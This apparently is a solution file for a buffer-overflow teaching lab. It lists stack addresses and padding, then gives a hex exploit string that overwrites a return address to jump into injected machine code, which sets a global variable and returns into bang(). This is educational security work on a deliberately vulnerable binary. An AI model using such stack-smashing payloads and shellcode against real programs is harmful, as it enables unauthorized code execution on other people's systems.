/* getbuf return address is located at address: 0x55683754 */
/* bang() return address is located at address: 0x55683758 */
/* Local buffer starts at address: 0x55683728 */
/* Padding required: 44 Bytes(exclude 4 Bytes return address, and 4 Bytes argument) */

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
/* offend code is located at 0x5568375c */
5c 37 68 55
/* bang() is located at address: 0x08048d05 */
05 8d 04 08
/* offend code */
b8 10 a0 8e 2a
bb 18 c2 04 08 
89 03           
c3               
